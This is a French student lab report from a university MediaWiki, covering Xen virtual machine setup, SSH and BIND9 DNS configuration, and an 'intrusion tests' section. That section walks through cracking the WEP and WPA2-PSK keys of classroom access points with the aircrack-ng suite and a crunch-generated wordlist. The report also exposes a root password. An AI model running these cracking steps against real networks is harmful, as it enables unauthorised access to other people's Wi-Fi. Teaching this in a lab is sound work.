 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
[En cours]&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'access point connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi :&lt;br /&gt;
Source : https://www.cisco.com/en/US/docs/routers/access/800/850/software/configuration/guide/wireless.html&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en route (mdp : Cisco si par défaut)&lt;br /&gt;
 int sh =&amp;gt; pour trouver le nom de l'interface radio principale&lt;br /&gt;
 conf t =&amp;gt; Passer en mode configuration&lt;br /&gt;
 int dot11radio0 =&amp;gt; On se place sur la première interface radio de l'AP&lt;br /&gt;
 broadcast-key vlan 42 change 45&lt;br /&gt;
 broadcast-key vlan 1 change 45 =&amp;gt; Rafraichissement de la clé d'encryption toutes les 45 secondes &lt;br /&gt;
 ssid e304 =&amp;gt; Condiguration du SSID&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=57056</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=57056"/>
				<updated>2021-12-13T17:04:13Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
Configuration du SSH &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
Configuration du DNS :&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.site&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   193.48.57.0/24 ;&lt;br /&gt;
 };&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
         //allow-transfer {; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
 @       IN      SOA     ns1.paixdieu.site. postmaster.paixdieu.site. (&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.paixdieu.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.177&lt;br /&gt;
 www     IN      A       193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Pour tester le bon fonctionnement du serveur DNS, nous utilisons la commande :&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;host -t any paixdieu.site localhost&lt;br /&gt;
&lt;br /&gt;
Résultat, cela fonctionne bien :&lt;br /&gt;
&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: localhost&lt;br /&gt;
 Address: 127.0.0.1#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 paixdieu.site has SOA record ns1.paixdieu.site. postmaster.paixdieu.site. 4 604800 86400 2419200 604800&lt;br /&gt;
 paixdieu.site name server ns6.gandi.net.&lt;br /&gt;
 paixdieu.site name server ns1.paixdieu.site.&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
